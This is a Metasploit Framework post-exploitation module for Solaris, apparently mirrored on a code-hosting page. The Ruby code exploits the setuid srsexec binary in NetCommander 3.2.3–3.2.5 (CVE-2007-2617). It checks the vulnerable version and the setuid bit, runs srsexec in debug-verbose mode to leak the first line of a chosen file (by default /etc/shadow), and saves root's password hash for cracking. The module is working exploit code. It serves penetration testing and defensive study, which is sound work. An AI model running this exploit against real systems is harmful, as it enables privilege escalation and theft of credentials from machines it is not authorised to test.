Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/solaris/escalate/srsexec_readline.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Solaris::System
9
include Msf::Post::Solaris::Priv
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Solaris srsexec Arbitrary File Reader',
16
'Description' => %q{
17
This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.
18
When srsexec is executed in debug (-d) verbose (-v) mode,
19
the first line of an arbitrary file can be read due to the suid bit set.
20
The most widely accepted exploitation vector is reading /etc/shadow,
21
which will reveal root's hash for cracking.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [
25
'h00die', # metasploit module
26
'iDefense' # discovery reported anonymously to https://labs.idefense.com
27
],
28
'Platform' => [ 'solaris' ],
29
'SessionTypes' => [ 'shell', 'meterpreter' ],
30
'References' => [
31
['CVE', '2007-2617'],
32
['URL', 'https://download.oracle.com/sunalerts/1000443.1.html'],
33
['URL', 'https://www.securityfocus.com/archive/1/468235'],
34
['EDB', '30021'],
35
['BID', '23915']
36
],
37
'DisclosureDate' => '2007-05-07',
38
'Notes' => {
39
'Stability' => [CRASH_SAFE],
40
'SideEffects' => [IOC_IN_LOGS],
41
'Reliability' => []
42
}
43
)
44
)
45
register_options([
46
OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow'])
47
])
48
end
49
50
def suid_bin_path
51
'/opt/SUNWsrspx/bin/srsexec'
52
end
53
54
def check
55
if is_root?
56
fail_with(Failure::BadConfig, 'Session already has root privileges')
57
end
58
59
# This ls is based on the guidance in the sun alerts article
60
unin = cmd_exec '/usr/bin/ls /opt/SUNWsrspx/bin/UninstallNetConnect.*.sh'
61
unin =~ /UninstallNetConnect\.([\d.]{11})\.sh/
62
unless ::Regexp.last_match(1)
63
print_error('NetConnect uninstall not found, either not installed or too new')
64
return false
65
end
66
67
version = Rex::Version.new(::Regexp.last_match(1).split('.').map(&:to_i).join('.'))
68
unless version.between?(Rex::Version.new('3.2.3'), Rex::Version.new('3.2.4'))
69
print_error "#{version} is not vulnerable"
70
return false
71
end
72
print_good("#{version} is vulnerable")
73
74
unless setuid?(suid_bin_path)
75
vprint_error("#{suid_bin_path} is not setuid, it must have been manually patched")
76
return false
77
end
78
79
true
80
end
81
82
def run
83
unless check
84
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
85
end
86
87
flag = Rex::Text.rand_text_alpha(5)
88
output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")
89
vprint_good("Raw Command Output: #{output}")
90
91
# The first line of the file is cut at 20 characters.
92
# If the output is longer than 20 characters, then
93
# the next line will start with the last 2 characters from the previous line,
94
# followed by the next 18 characters.
95
96
formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map do |line|
97
(line.length == 20) ? line[0..17] : line
98
end.join
99
100
return if formatted_output.empty?
101
102
print_good("First line of #{datastore['FILE']}: #{formatted_output}")
103
104
return unless datastore['FILE'] == '/etc/shadow'
105
106
print_good("Adding root's hash to the credential database.")
107
credential_data = {
108
origin_type: :session,
109
session_id: session_db_id,
110
workspace_id: myworkspace_id,
111
post_reference_name: fullname,
112
username: formatted_output.split(':')[0],
113
private_data: formatted_output.split(':')[1],
114
private_type: :nonreplayable_hash
115
}
116
create_credential(credential_data)
117
end
118
end
119
120